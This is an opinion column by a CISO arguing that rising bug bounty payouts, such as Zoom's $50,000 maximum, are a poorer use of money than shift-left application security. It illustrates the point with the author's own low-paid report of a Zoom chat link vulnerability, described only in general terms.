Lofty bug bounties catch attention, but don't alleviate the application security flaws they are trying to solve.

Alex Haynes, Chief Information Security Officer, IBS Software

February 4, 2021

4 Min Read

Zoom recently increased its maximum payout for vulnerabilities to $50,000 as part of its crowdsourced security program. Such a lofty figure makes great headlines, attracts new talent in search of the big bucks, and raises the question — how much is a vulnerability worth?

I found several bugs in Zoom's products several years back, when its crowdsourced security program was a fledgling enterprise. Three of them were found by others before me — what we call a "duplicate" in crowdsourced security — meaning you get no reward for your time or effort even though it's a valid bug.

The fourth vulnerability was quite interesting, and it reappeared at the start of the pandemic when Zoom was under increased usage (and increased scrutiny). I labeled the vulnerability "Potentially unsafe URIs can cause local file inclusion, command injection, or remote connection," which is exactly what it did. To summarize, you could send Uniform Resource Identifiers that would appear as links to someone you were chatting with, and these could do various things like open malicious websites, download files, or even run commands on the user's system. (Bizarrely, it even worked with the gopher:// protocol.) The vulnerability that reappeared at the beginning of 2020 was identical and focused on Universal Naming Convention (UNC) paths so that you could send NT LAN Manager (NTLM) credentials to an attacker's domain.

For reporting this vulnerability, I was (eventually) paid the "princely" sum of $50, and it took about six months for the vulnerability to work its way to the powers that be. Two years later, I received a message saying it had been fixed, and could I spend my free time checking the fix? (I didn't.) Today, far more lavish payouts are common in crowdsourced security — and they distract from the real problem: Should we really be paying out $50,000 for a vulnerability?

How Lavish Rewards Harm People and Products
These kinds of sums are not new, of course. Zoom zero-days at the height of the pandemic reportedly were being sold for $500,000 for the Windows app, and companies like Zerodium frequently traffic in these kinds of vulnerabilities in the "grey market" area of vulnerability transactions.

Back to the question at hand, there are many downsides to ever-increasing payouts in crowdsourced security programs. While the main aim is to increase interest in the program (remember, crowdsourced programs rely on an Orwellian gig economy, where you work for free unless you find a valid bug), they also have a counterproductive effect of cannibalizing talent away from legitimate security areas, salaried or otherwise.

The cost of paying to fix vulnerabilities when they are live is also in play. That $50,000 could easily be spent fixing root causes of vulnerabilities and "shifting left" to pay for far more than a single fix. Some obvious examples of how that money could be used:

  • A full-time application security engineer

  • From 10 to 20 pen tests or code reviews (depending on the day rate)

  • A full suite of automated pen-testing software

  • Full deployment and implementation of static application security testing (SAST) software (code scanning/dependencies) across upwards of 10 million lines of code

  • Training hundreds of developers in secure coding techniques

Any of the above would spot issues raised in crowdsourced programs long before they ever made it to a live environment — and at a far cheaper cost. While the argument is that the bug reward offsets the monetary impact of an eventual vulnerability exploit, the counter to that is that if you were to take a shift-left approach, the offset would be multiplied by a factor of 10. If your SAST or application security engineers or even your code reviews spot 10 of these vulnerabilities before going live, you've also mitigated the additional cost of refactoring code and pushing a single build to fix a single vulnerability.

Chase the Cause, Not the Symptom
Crowdsourced security scales for a problem that always chases the symptom, not the cause, and offering ever-increasing rewards won't alleviate the structural issues they are trying to solve: good application security hygiene. While the same could be said for the alphabet soup of acronyms in the cybersecurity technology space (think IAM, WAF, DAST, SIEM, etc.), many technologies are simply bandages over what a comprehensive application security pipeline would resolve.

Paying five-figure rewards for single vulnerabilities won't suddenly mean you have better security. When deciding how much to pay for a vulnerability, if the question becomes, "is this too much for a vulnerability?" then you should be asking yourself "Am I shifting left enough?"

About the Author(s)

Alex Haynes

Chief Information Security Officer, IBS Software

Alex Haynes is a former pen tester with a background in offensive security and is credited for discovering vulnerabilities in products by Microsoft, Adobe, Pinterest, Amazon Web Services and IBM. He is a former top 10 ranked researcher on Bugcrowd and a member of the Synack Red Team. He is currently CISO at IBS Software. Alex has contributed to United States Cyber Security Magazine, Cyber Defense Magazine, Infosecurity Magazine, and IAPP tech blog. He also has spoken at security conferences including OWASP and ISC Security Summits.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like


More Insights